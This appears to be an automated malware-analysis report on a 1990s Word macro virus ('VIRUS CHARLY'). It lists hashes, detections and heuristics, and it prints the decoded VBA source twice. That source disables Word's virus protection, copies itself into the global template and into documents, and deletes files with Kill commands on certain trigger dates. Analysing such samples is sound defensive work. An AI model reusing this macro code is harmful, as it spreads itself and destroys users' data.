Office (OLE) malware analysis — malicious · 9fd4bfb080b33633

MALICIOUS

Office (OLE)

44.0 KB Created: 2000-04-25 04:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 1e32e7f44872269a3f4c0e5388b727bd SHA-1: eddcad237da67bb1862ef29d7ae49b558eb450ea SHA-256: 9fd4bfb080b3363374053a96e5099de02cdc47c74174367456979f37a6d45afe

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macros, specifically AutoOpen and AutoClose, which are indicative of older malware attempting to infect documents. The script's logic suggests it aims to spread itself to other documents and potentially execute a payload named 'CHARLY_32'. The presence of these macros and the ClamAV detection strongly suggest a malicious document designed for propagation.

Heuristics 5

ClamAV: Doc.Trojan.Nottice-6 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Nottice-6
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6788 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6788 bytes
SHA-256: `9ff08635cee224c8dc38b2a33f23a64fae8c6374141c7378aa5a8867b1d7d5cc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" 'VIRUS CHARLY Ver 3.2 Copyright Lima - Perú 1998. Actualizado el 31 de Mayo 1999 'Fué creado el 1 de Dic. de 1998 por CharlySoft. Está protegido por las leyes del 'derecho de autor; cualquier intento de copia sera sancionada drásticamente. ' ---------> Je Je Je... Carlos Javier T.A. Sub Main() Application.DisplayAlerts = wdAlertsNone Options.VirusProtection = False Dim Cjt$: On Error GoTo -1: On Error GoTo SALIDA WordBasic.DisableAutoMacros 0 Cjt$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10)) If Cjt$ = "normal.dot" Then If INFECTA_D = 1 Then GoTo SALIDA Else InfectaDOC End If Else If INFECTA_G = 1 Then GoTo SALIDA Else InfectaGlobal End If End If SALIDA: WordBasic.Call "CHARLY_32" End Sub Sub HerramMacro() CharlyForm.Show End Sub Sub ViewVBCode() End Sub Private Function INFECTA_D() Dim i INFECTA_D = 0 If WordBasic.CountMacros(1) > 0 Then For i = 1 To WordBasic.CountMacros(1) If WordBasic.[MacroName$](i, 1) = "CHARLY_32" Then INFECTA_D = 1 Next i End If End Function Private Function INFECTA_G() Dim i INFECTA_G = 0 If WordBasic.CountMacros(0) > 0 Then For i = 1 To WordBasic.CountMacros(0) If WordBasic.[MacroName$](i, 0) = "CHARLY_32" Then INFECTA_G = 1 Next i End If End Function Private Sub InfectaDOC() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen" WordBasic.MacroCopy "Global:CHARLY_32", WordBasic.[FileName$]() + ":CHARLY_32" Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="CharlyForm", Object:=wdOrganizerObjectProjectItems WordBasic.FileSaveAll 1, 1 End Sub Private Sub InfectaGlobal() WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose" WordBasic.MacroCopy WordBasic.[FileName$]() + ":CHARLY_32", "Global:CHARLY_32" Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="CharlyForm", Object:=wdOrganizerObjectProjectItems WordBasic.FileSaveAll 1, 0 End Sub Attribute VB_Name = "CHARLY_32" Dim Texto As String Public Sub Main() Attribute Main.VB_Description = "Macro creada el 01/12/98 por mi%\r\n" Attribute Main.VB_ProcData.VB_Invoke_Func = "Project.CHARLYTO.MAIN" Set Wb = WordBasic: WkDia = WordBasic.WeekDay(WordBasic.Now()): Dia = WordBasic.Day(WordBasic.Now()): MES = WordBasic.Month(WordBasic.Now()) If (Dia = 19 Or Dia = 23) And MES = 5 Then If Dia = 23 Then Texto = "FELIZ CUMPLEAÑOS CHARLY": FORMATO Wb.Insert "CHARLY Cumple " + Str(Wb.Year(Wb.Now()) - 1978) + " Hoy" Wb.InsertPara: Wb.InsertPara Wb.Insert "*Lima - Perú (VIRUS CHARLY)": EMAIL Else Texto = "FELICIDADES POR TU CUMPLEAÑOS MINI": FORMATO Wb.Insert "En Homenaje a mi Querida Hermanita. " Wb.FormatFont Points:="24", Color:=2: Wb.Insert ": " Wb.FormatFont Points:="18", Color:=6: Wb.Insert ")" Wb.InsertPara: Wb.InsertPara Wb.Insert "Lima - Perú (VIRUS CHARLY)": EMAIL End If KILLER INFINITO: 'Tasks.ExitWindows GoTo INFINITO End If 'FECHAS ESPECIALES* If Dia = 4 Or Dia = 11 Or (Dia = 13 And WkDia = 6) Or Dia = 31 Or (Dia = 17 And MES = 3) Or (Dia = 25 And MES = 12) Then If Dia = 17 Then Texto = "Maldita Cecilia; Arruinastes mi Vida...": FORMATO ElseIf Dia = 25 Then Texto = "FELIZ NAVIDAD .... Je Je Je": FORMATO Wb.Insert "Les Desea C.J.T.A." End If Texto = " *Lima - Perú (VIRUS CHARLY)": FORMATO EMAIL KILLER GoTo INFINITO End If End Sub Private Function KILLER() 'Elimina archivos* On Error Resume Next: Kill "C:\." On Error Resume Next: Kill "C:\Wind ... (truncated)

SHA-256: 9ff08635cee224c8dc38b2a33f23a64fae8c6374141c7378aa5a8867b1d7d5cc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
'VIRUS CHARLY  Ver 3.2 Copyright  Lima - Perú 1998. Actualizado el 31 de Mayo 1999
'Fué creado el 1 de Dic. de 1998 por CharlySoft. Está protegido por las leyes del
'derecho de autor; cualquier intento de copia sera sancionada drásticamente.
' --------->        Je Je Je...      Carlos Javier T.A.
Sub Main()
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Dim Cjt$: On Error GoTo -1: On Error GoTo SALIDA
WordBasic.DisableAutoMacros 0
Cjt$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If Cjt$ = "normal.dot" Then
   If INFECTA_D = 1 Then
      GoTo SALIDA
   Else
      InfectaDOC
   End If
Else
   If INFECTA_G = 1 Then
      GoTo SALIDA
   Else
      InfectaGlobal
   End If
End If
SALIDA:
WordBasic.Call "CHARLY_32"
End Sub
Sub HerramMacro()
    CharlyForm.Show
End Sub
Sub ViewVBCode()
    
End Sub
Private Function INFECTA_D()
Dim i
INFECTA_D = 0
If WordBasic.CountMacros(1) > 0 Then
   For i = 1 To WordBasic.CountMacros(1)
     If WordBasic.[MacroName$](i, 1) = "CHARLY_32" Then INFECTA_D = 1
   Next i
End If
End Function
Private Function INFECTA_G()
Dim i
INFECTA_G = 0
If WordBasic.CountMacros(0) > 0 Then
   For i = 1 To WordBasic.CountMacros(0)
     If WordBasic.[MacroName$](i, 0) = "CHARLY_32" Then INFECTA_G = 1
   Next i
End If
End Function
Private Sub InfectaDOC()
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:CHARLY_32", WordBasic.[FileName$]() + ":CHARLY_32"
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="CharlyForm", Object:=wdOrganizerObjectProjectItems
WordBasic.FileSaveAll 1, 1
End Sub
Private Sub InfectaGlobal()
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":CHARLY_32", "Global:CHARLY_32"
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="CharlyForm", Object:=wdOrganizerObjectProjectItems
WordBasic.FileSaveAll 1, 0
End Sub

Attribute VB_Name = "CHARLY_32"
Dim Texto As String
Public Sub Main()
Attribute Main.VB_Description = "Macro creada el 01/12/98 por mi%\r\n"
Attribute Main.VB_ProcData.VB_Invoke_Func = "Project.CHARLYTO.MAIN"
Set Wb = WordBasic: WkDia = WordBasic.WeekDay(WordBasic.Now()): Dia = WordBasic.Day(WordBasic.Now()): MES = WordBasic.Month(WordBasic.Now())
If (Dia = 19 Or Dia = 23) And MES = 5 Then
 If Dia = 23 Then
   Texto = "FELIZ CUMPLEAÑOS CHARLY": FORMATO
   Wb.Insert "CHARLY Cumple " + Str(Wb.Year(Wb.Now()) - 1978) + " Hoy"
   Wb.InsertPara: Wb.InsertPara
   Wb.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
 Else
   Texto = "FELICIDADES POR TU CUMPLEAÑOS MINI": FORMATO
   Wb.Insert "En Homenaje a mi Querida Hermanita.   "
   Wb.FormatFont Points:="24", Color:=2: Wb.Insert ": "
   Wb.FormatFont Points:="18", Color:=6: Wb.Insert ")"
   Wb.InsertPara: Wb.InsertPara
   Wb.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
 End If
   KILLER
INFINITO:    'Tasks.ExitWindows
   GoTo INFINITO
End If       '***FECHAS ESPECIALES***
If Dia = 4 Or Dia = 11 Or (Dia = 13 And WkDia = 6) Or Dia = 31 Or (Dia = 17 And MES = 3) Or (Dia = 25 And MES = 12) Then
   If Dia = 17 Then
      Texto = "Maldita Cecilia; Arruinastes mi Vida...": FORMATO
   ElseIf Dia = 25 Then
      Texto = "FELIZ NAVIDAD .... Je Je Je": FORMATO
      Wb.Insert "Les Desea C.J.T.A."
   End If
   Texto = " ***Lima - Perú (VIRUS CHARLY)***": FORMATO
   EMAIL
   KILLER
GoTo INFINITO
End If
End Sub
Private Function KILLER() '***Elimina archivos***
On Error Resume Next: Kill "C:\*.*"
On Error Resume Next: Kill "C:\Wind
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.